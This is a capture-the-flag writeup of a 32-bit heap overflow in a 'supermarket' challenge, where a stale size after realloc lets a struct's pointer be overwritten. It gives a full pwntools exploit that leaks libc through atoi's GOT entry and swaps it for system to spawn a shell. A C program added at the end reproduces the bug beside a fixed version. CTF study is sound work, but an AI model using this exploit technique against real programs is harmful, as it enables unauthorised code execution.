<!-- wp:paragraph --> <p>A note up front: this writeup is rough; I only wrote down the key points.</p> <!-- /wp:paragraph -->
<!-- wp:paragraph --> <p>I am gradually getting the hang of heap exploitation. This is a fairly simple heap overflow; the main difficulty is that the program is relatively complex and tedious to analyse (I have never been through the baptism of reverse engineering, after all).</p> <!-- /wp:paragraph -->
<!-- wp:paragraph --> <p>In short:</p> <!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":838,"sizeSlug":"large","linkDestination":"none"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/12/QQ截图20201225230159.png" alt="" class="wp-image-838"/></figure></div> <!-- /wp:image -->
<!-- wp:paragraph --> <p>The change-description function reallocates the description buffer with realloc but never updates the size field stored in the commodity struct. So we first allocate a large description and then change it to a small one: when realloc shrinks a chunk it splits it in place and frees the remainder, so the next commodity struct we add is carved straight out of the split-off chunk. Because the program still trusts the old, larger size when it next reads a description for commodity 0, we can write past the shrunken buffer over that struct, including its description pointer, which gives us arbitrary address read and write. (One caveat: carving the next struct out of the remainder relies on the freed remainder sitting in the unsorted bin and being split for the next small request, as in glibc 2.23; with tcache, glibc 2.26 and later, a remainder of that size is cached by exact size and the next struct comes from the top chunk instead, so check the libc shipped with the challenge.)</p> <!-- /wp:paragraph -->
<!-- wp:code --> <pre class="wp-block-code"><code>#!/usr/bin/env python
# coding=utf-8
from pwn import *

#sh = process("./supermarket")
sh = remote("220.249.52.134", "46004")
context(log_level='debug', arch='i386')
elf = ELF("./supermarket")
libc = ELF("./libc.so.6")

def add(index, size, payload):
    # menu 1: new commodity; name, price, description size, description
    sh.sendlineafter("your choice>> ", '1')
    sh.sendlineafter("name:", str(index))
    sh.sendlineafter("price:", "100")
    sh.sendlineafter("descrip_size:", str(size))
    sh.sendlineafter("description:", payload)

def delete(index):
    # menu 2: delete commodity by name (unused in this exploit)
    sh.sendlineafter("your choice>> ", '2')
    sh.sendlineafter("name:", str(index))

def show_list():
    # menu 3: print every commodity, including its description
    sh.sendlineafter("your choice>> ", '3')

def ChangeDescript(index, size, payload):
    # menu 5: realloc the description to `size` but leave descrip_size stale
    sh.sendlineafter("6. exit\nyour choice>> ", '5')
    sh.sendlineafter("name:", str(index))
    sh.sendlineafter("descrip_size:", str(size))
    sh.sendlineafter("description:", payload)

# large description, then shrink it to 8 bytes: the 0xf8 remainder is freed
add(0, 0x100, 'nothing')
ChangeDescript(0, 8, 'nothing')
# the new commodity struct is carved from the freed remainder, right after the 8-byte buffer
add(1, 0x40, 'nothing')

# stale size (0x100) lets us write over commodity 1's struct:
# 8 bytes of buffer | prev_size | size | name[16] | price | descrip_size | description ptr
payload = 'a' * 8 + p32(16) + p32(0x40 + 0x8) + 'c' * 4 + 'c' * 16 + p32(0x40) + p32(elf.got["atoi"])
ChangeDescript(0, 8, payload)

# commodity 1's description pointer now points at atoi@got, so listing leaks libc
show_list()
sh.recvuntil("des.")
sh.recvuntil("des.")
atoi_addr = u32(sh.recv(4))
system_addr = atoi_addr - libc.symbols["atoi"] + libc.symbols["system"]
print(hex(system_addr))

# size 0x40 equals the stored descrip_size, so no realloc happens: the write lands on atoi@got
ChangeDescript('c' * 20 + '\x40', 0x40, p32(system_addr))
# the menu reads our choice with atoi(), which is now system()
sh.sendlineafter("your choice>> ", '/bin/sh')
sh.interactive()</code></pre> <!-- /wp:code -->
<!-- wp:paragraph --> <p>The odd name <code>'c' * 20 + '\x40'</code> in <code>ChangeDescript('c' * 20 + '\x40',0x40,p32(system_addr))</code> is there because overwriting the struct clobbered the original name field: the 16 name bytes and the 4 price bytes are all 'c', with no terminator until the null byte of <code>p32(0x40)</code>, so the name reads as twenty 'c's followed by 0x40. The <code>show_list()</code> call printed this name back out, and that is what the lookup must match.</p> <!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":840,"sizeSlug":"large","linkDestination":"none"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/12/QQ图片20201225231115.png" alt="" class="wp-image-840"/></figure></div> <!-- /wp:image -->
Last modified: December 30, 2020, 11:47 PM © Reposting with proper attribution permitted
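The bug the writeup exploits, reproduced as a standalone C program. This is an added example, not code from the challenge binary or the original post: the struct layout (name, price, descrip_size, description pointer) is reconstructed from the field order in the exploit payload and is an assumption, and <code>malloc_usable_size</code> is glibc-specific. The vulnerable change function is shown beside the hardened one, and <code>demo()</code> replays the writeup's sequence (large description, shrink to 8, add the next commodity) and reports how far a read trusting the stale size would run past the shrunken buffer and whether the next struct lands inside that window. Nothing is actually overflowed; the program only measures.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>   /* malloc_usable_size(): glibc-specific */

/* Field order reconstructed from the exploit payload; the real binary's
 * layout is an assumption for this example. */
struct commodity {
    char name[16];
    int price;
    unsigned int descrip_size;   /* size the program trusts when it reads a description */
    char *description;
};

static struct commodity *add_commodity(const char *name, int price, unsigned int size)
{
    struct commodity *c = calloc(1, sizeof *c);
    if (!c) abort();
    strncpy(c->name, name, sizeof c->name - 1);
    c->price = price;
    c->descrip_size = size;
    c->description = calloc(1, size);
    if (!c->description) abort();
    return c;
}

/* The bug: the buffer is reallocated, but descrip_size keeps the old value,
 * so the next read(0, description, descrip_size) overflows the new buffer. */
void change_description_vuln(struct commodity *c, unsigned int new_size)
{
    if (new_size != c->descrip_size) {
        char *p = realloc(c->description, new_size);
        if (!p) abort();
        c->description = p;
        /* c->descrip_size = new_size;   <- the missing update */
    }
}

/* Hardened form: pointer and trusted size change together. */
void change_description_fixed(struct commodity *c, unsigned int new_size)
{
    if (new_size != c->descrip_size) {
        char *p = realloc(c->description, new_size);
        if (!p) abort();
        c->description = p;
        c->descrip_size = new_size;
    }
}

/* Bytes a read of descrip_size bytes would write past the current allocation. */
size_t stale_overflow_bytes(const struct commodity *c)
{
    size_t usable = malloc_usable_size(c->description);
    return c->descrip_size > usable ? c->descrip_size - usable : 0;
}

/* Is target inside the write window [description, description + descrip_size)? */
int window_reaches(const struct commodity *c, const void *target)
{
    uintptr_t lo = (uintptr_t)c->description, t = (uintptr_t)target;
    return t >= lo && t < lo + c->descrip_size;
}

struct demo_result { size_t overflow; int next_in_window; };

/* Replay the writeup: 0x100-byte description, shrink to 8, add commodity 1 (0x40). */
struct demo_result demo(void (*change)(struct commodity *, unsigned int))
{
    struct demo_result r;
    struct commodity *c0 = add_commodity("first", 100, 0x100);
    change(c0, 8);
    struct commodity *c1 = add_commodity("second", 100, 0x40);
    r.overflow = stale_overflow_bytes(c0);
    r.next_in_window = window_reaches(c0, c1);   /* allocator-dependent, see note */
    free(c1->description); free(c1);
    free(c0->description); free(c0);
    return r;
}

int main(void)
{
    struct demo_result v = demo(change_description_vuln);
    struct demo_result f = demo(change_description_fixed);
    printf("vulnerable: %zu bytes past the shrunken buffer; next struct in window: %s\n",
           v.overflow, v.next_in_window ? "yes" : "no (remainder cached, e.g. tcache)");
    printf("fixed:      %zu bytes past the buffer; next struct in window: %s\n",
           f.overflow, f.next_in_window ? "yes" : "no");
    return 0;
}
```

The overflow count is the reliable signal: it is non-zero whenever the trusted size outlives the reallocation, regardless of libc version. Whether the next commodity actually lands inside the window depends on what the allocator does with the freed remainder, which is exactly what to check (with a debugger or the libc version) before reusing this exploit against a different build.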